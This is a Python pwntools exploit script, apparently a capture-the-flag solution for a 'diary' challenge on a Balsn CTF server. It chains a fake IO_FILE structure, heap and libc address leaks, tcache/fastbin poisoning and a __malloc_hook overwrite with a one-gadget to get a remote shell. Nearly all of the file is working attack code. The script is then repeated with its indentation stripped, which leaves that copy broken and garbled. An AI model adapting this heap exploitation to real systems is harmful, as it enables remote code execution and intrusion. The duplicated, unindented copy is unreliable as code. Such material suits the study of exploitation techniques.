hkraw/diary_expl.py

## diary_expl.py
#!/usr/bin/python3
from pwn import *
from IO_FILE import *
from past.builtins import xrange
from time import sleep
from subprocess import check_output
import random

#Utils
def writediary(diarylen,content,drop=False,ok=False,shell=False):
	if drop==True:
		if ok==False:
			io.send('\n')
		sleep(.1)
		io.sendline('2')
		sleep(.1)
		io.sendline()
		sleep(.1)
		io.sendline(str(diarylen))
		sleep(.1)
		io.send(content)
	else:
		io.sendafter('choice : ','2')
		io.sendafter('Diary Length : ',f'{diarylen}')
		if shell==True: return 0
		io.sendafter('Diary Content : ',content)

def readdiary(idx, data=None,ok=False, drop=False,seconds=0.1):
	if drop == False:
		io.sendlineafter('choice : ', '3')
		io.sendlineafter('Page : ', str(idx))
	else:

		if ok==False:
			io.send('\n')
	#	pause()
		sleep(seconds)
		io.sendline('3')
		sleep(seconds)
	#	pause()
		io.send('\n')
		sleep(seconds)
	#	pause()
		io.sendline(str(idx))
		sleep(seconds)
		io.send(data)

def editdiary(pageno,content):
	io.sendafter('choice : ','4')
	io.sendafter('Page : ',f'{pageno}')
	io.sendafter('Content : ',content)

def teardiary(pageno,ok=False,drop=False):
	if drop==False:
		io.sendafter('choice : ','5')
		io.sendafter('Page : ',f'{pageno}')
	else:
		if ok==False:
			io.send('\n')
		sleep(.1)
		io.sendline('5')
		sleep(.1)
		io.send('\n')
		sleep(.1)
		io.send(str(pageno))

def viewname(newname,ok=True):
	if ok==True:
		io.send('1')
		sleep(.3)
		io.send(newname)
	else:
		sleep(.3)
		io.send('\n')
		sleep(.3)
		io.send('1')
		sleep(.3)
		io.send(newname)

def getpid(process_name):
	s = str(subprocess.check_output(['pidof',process_name]))[2:]
	pid = ''
	for each in s:
		if each != ' ' and each != '\\':
			pid += each
		else:
			break
	return int(pid)

# libc 2.29
#libc = ELF('./libc-2.29.so',checksec=False)
_IO_file_jumps = 0x1e6560
__malloc_hook = 0x1e4c30

# Exploit
while True:
#	io = process('./diary',env={'LD_PRELOAD':libc.path})
#	io = remote('localhost',31337)
#	while True:
#		io = remote('localhost', 31337)
#		pid = getpid('diary')
#		maps = open(f'/proc/{pid}/maps', 'r')
#		data = maps.read(570)
#		stdout = hex(int('0x' + maps.read(12), 0) + 0x3b2760)
#		n = stdout[-4:][0]
#		if n=='9':
#			break
#		else:
#			io.close()
#			continue
		io = remote('diary.balsnctf.com',10101)
#		io = remote('localhost',31337)
		io.sendafter('name : ','A'*0x20)
		writediary(0x80,'HK'*(0x80//2)) #0 Corrupting chunk
		writediary(0x80,'HK') #1
		writediary(0x80,'HK') #2 #This will later go into unsortedbin
		writediary(0x64,'HK') #3 This will go into tcache bin.
		writediary(0x64,p32(0)+p64(0)*10+p64(0x71)) #4 fastbins
		writediary(0x64,'HK') #5 fastbins

		teardiary(1) #delete diary 1 to set tcache idx - 1 ( size 0x90 ) This is used later in exploit.
		teardiary(3) #delete diary 3 to set tcache idx - 1 ( size 0x70 ).

		io.sendafter('choice : ','1')
		heap_base = u64(io.recvline().strip()[0x20:].ljust(8,b'\0'))-0x260
		print(hex(heap_base))

		_IO_FILE = IO_FILE_plus(arch=64)
		f_stream = _IO_FILE.construct(flags=0xfbad3887,
					fileno=0x1,lock=heap_base+0x48)[0x4:0xc8]+\
					p64(0x73)+\
					p64(0)+\
					b'\x98'
		editdiary(-8,f_stream)
		sleep(.1)
		io.send('A')
		viewname(b'B'*0x20+p64(heap_base+(0x17-0x4))[0:6])
		readdiary(0,'\7',drop=True,ok=False) #Set tcache idx to 7
		sleep(.1)
		io.send('A')
		viewname(b'C'*0x20+p64(heap_base+(0x15-0x4))[0:6])
		readdiary(0,'\7',drop=True,ok=False) #set tcache idx to 7
		teardiary(2,drop=True)
		teardiary(4,drop=True)
		sleep(.4)
		teardiary(5,drop=True)
		sleep(2)
		io.sendline('A')
		viewname(b'A'*0x20+p64(heap_base+(0x380-0x4))[0:6])
		readdiary(0,'\x20\xc8',drop=True,ok=False)
		sleep(1)
		io.send('A')
		viewname(b'D'*0x20+p64(heap_base+(0x378 - 0x4))[0:6])
		readdiary(0,'\x71',drop=True,ok=False)
		sleep(.50)
		io.send('A')
		viewname(b'A'*0x20+p64(heap_base+(0x4f0-0x4))[0:6])
		sleep(.50)
		readdiary(0,p64(heap_base+0x370)[0:6],drop=True,ok=False)
		sleep(.50)
		writediary(0x64,p32(0x0)+p64(0)*10+p64(0x11),drop=True,ok=False) #6
		writediary(0x64,'HKHK',drop=True,ok=False) #7
	#	pause()
		sleep(.50)
		viewname(b'A'*0x20+p64(heap_base+0x4e0)[0:6],ok=False)
		sleep(.50)
		try:
			writediary(0x64,p32(0xffffffff)+b'\x60',drop=True,ok=False) #8
			readdiary(8)
			libc_leak = u64(io.recvline().strip()[4:].ljust(8,b'\0'))
			libc_base = libc_leak - _IO_file_jumps
			if libc_base&0xfff==0:
				print('FUCK YES')
		except:
			io.close()
			continue
		print(hex(libc_base))
		teardiary(6)
		teardiary(0)
		writediary(0x64,p32(0)+p64(0x71)+p64(libc_base+__malloc_hook-0x23)) #9
		writediary(0x64,'HK') #10
		writediary(0x64,b'A'*(0x23-0x14) + p64(libc_base+0x106ef8)) #11
		writediary(0x41,'RIP',shell=True) #12
		io.interactive()
	#!/usr/bin/python3
	from pwn import *
	from IO_FILE import *
	from past.builtins import xrange
	from time import sleep
	from subprocess import check_output
	import random

	#Utils
	def writediary(diarylen,content,drop=False,ok=False,shell=False):
	if drop==True:
	if ok==False:
	io.send('\n')
	sleep(.1)
	io.sendline('2')
	sleep(.1)
	io.sendline()
	sleep(.1)
	io.sendline(str(diarylen))
	sleep(.1)
	io.send(content)
	else:
	io.sendafter('choice : ','2')
	io.sendafter('Diary Length : ',f'{diarylen}')
	if shell==True: return 0
	io.sendafter('Diary Content : ',content)

	def readdiary(idx, data=None,ok=False, drop=False,seconds=0.1):
	if drop == False:
	io.sendlineafter('choice : ', '3')
	io.sendlineafter('Page : ', str(idx))
	else:

	if ok==False:
	io.send('\n')
	# pause()
	sleep(seconds)
	io.sendline('3')
	sleep(seconds)
	# pause()
	io.send('\n')
	sleep(seconds)
	# pause()
	io.sendline(str(idx))
	sleep(seconds)
	io.send(data)

	def editdiary(pageno,content):
	io.sendafter('choice : ','4')
	io.sendafter('Page : ',f'{pageno}')
	io.sendafter('Content : ',content)

	def teardiary(pageno,ok=False,drop=False):
	if drop==False:
	io.sendafter('choice : ','5')
	io.sendafter('Page : ',f'{pageno}')
	else:
	if ok==False:
	io.send('\n')
	sleep(.1)
	io.sendline('5')
	sleep(.1)
	io.send('\n')
	sleep(.1)
	io.send(str(pageno))

	def viewname(newname,ok=True):
	if ok==True:
	io.send('1')
	sleep(.3)
	io.send(newname)
	else:
	sleep(.3)
	io.send('\n')
	sleep(.3)
	io.send('1')
	sleep(.3)
	io.send(newname)

	def getpid(process_name):
	s = str(subprocess.check_output(['pidof',process_name]))[2:]
	pid = ''
	for each in s:
	if each != ' ' and each != '\\':
	pid += each
	else:
	break
	return int(pid)

	# libc 2.29
	#libc = ELF('./libc-2.29.so',checksec=False)
	_IO_file_jumps = 0x1e6560
	__malloc_hook = 0x1e4c30

	# Exploit
	while True:
	# io = process('./diary',env={'LD_PRELOAD':libc.path})
	# io = remote('localhost',31337)
	# while True:
	# io = remote('localhost', 31337)
	# pid = getpid('diary')
	# maps = open(f'/proc/{pid}/maps', 'r')
	# data = maps.read(570)
	# stdout = hex(int('0x' + maps.read(12), 0) + 0x3b2760)
	# n = stdout[-4:][0]
	# if n=='9':
	# break
	# else:
	# io.close()
	# continue
	io = remote('diary.balsnctf.com',10101)
	# io = remote('localhost',31337)
	io.sendafter('name : ','A'*0x20)
	writediary(0x80,'HK'*(0x80//2)) #0 Corrupting chunk
	writediary(0x80,'HK') #1
	writediary(0x80,'HK') #2 #This will later go into unsortedbin
	writediary(0x64,'HK') #3 This will go into tcache bin.
	writediary(0x64,p32(0)+p64(0)*10+p64(0x71)) #4 fastbins
	writediary(0x64,'HK') #5 fastbins

	teardiary(1) #delete diary 1 to set tcache idx - 1 ( size 0x90 ) This is used later in exploit.
	teardiary(3) #delete diary 3 to set tcache idx - 1 ( size 0x70 ).

	io.sendafter('choice : ','1')
	heap_base = u64(io.recvline().strip()[0x20:].ljust(8,b'\0'))-0x260
	print(hex(heap_base))

	_IO_FILE = IO_FILE_plus(arch=64)
	f_stream = _IO_FILE.construct(flags=0xfbad3887,
	fileno=0x1,lock=heap_base+0x48)[0x4:0xc8]+\
	p64(0x73)+\
	p64(0)+\
	b'\x98'
	editdiary(-8,f_stream)
	sleep(.1)
	io.send('A')
	viewname(b'B'*0x20+p64(heap_base+(0x17-0x4))[0:6])
	readdiary(0,'\7',drop=True,ok=False) #Set tcache idx to 7
	sleep(.1)
	io.send('A')
	viewname(b'C'*0x20+p64(heap_base+(0x15-0x4))[0:6])
	readdiary(0,'\7',drop=True,ok=False) #set tcache idx to 7
	teardiary(2,drop=True)
	teardiary(4,drop=True)
	sleep(.4)
	teardiary(5,drop=True)
	sleep(2)
	io.sendline('A')
	viewname(b'A'*0x20+p64(heap_base+(0x380-0x4))[0:6])
	readdiary(0,'\x20\xc8',drop=True,ok=False)
	sleep(1)
	io.send('A')
	viewname(b'D'*0x20+p64(heap_base+(0x378 - 0x4))[0:6])
	readdiary(0,'\x71',drop=True,ok=False)
	sleep(.50)
	io.send('A')
	viewname(b'A'*0x20+p64(heap_base+(0x4f0-0x4))[0:6])
	sleep(.50)
	readdiary(0,p64(heap_base+0x370)[0:6],drop=True,ok=False)
	sleep(.50)
	writediary(0x64,p32(0x0)+p64(0)*10+p64(0x11),drop=True,ok=False) #6
	writediary(0x64,'HKHK',drop=True,ok=False) #7
	# pause()
	sleep(.50)
	viewname(b'A'*0x20+p64(heap_base+0x4e0)[0:6],ok=False)
	sleep(.50)
	try:
	writediary(0x64,p32(0xffffffff)+b'\x60',drop=True,ok=False) #8
	readdiary(8)
	libc_leak = u64(io.recvline().strip()[4:].ljust(8,b'\0'))
	libc_base = libc_leak - _IO_file_jumps
	if libc_base&0xfff==0:
	print('FUCK YES')
	except:
	io.close()
	continue
	print(hex(libc_base))
	teardiary(6)
	teardiary(0)
	writediary(0x64,p32(0)+p64(0x71)+p64(libc_base+__malloc_hook-0x23)) #9
	writediary(0x64,'HK') #10
	writediary(0x64,b'A'*(0x23-0x14) + p64(libc_base+0x106ef8)) #11
	writediary(0x41,'RIP',shell=True) #12
	io.interactive()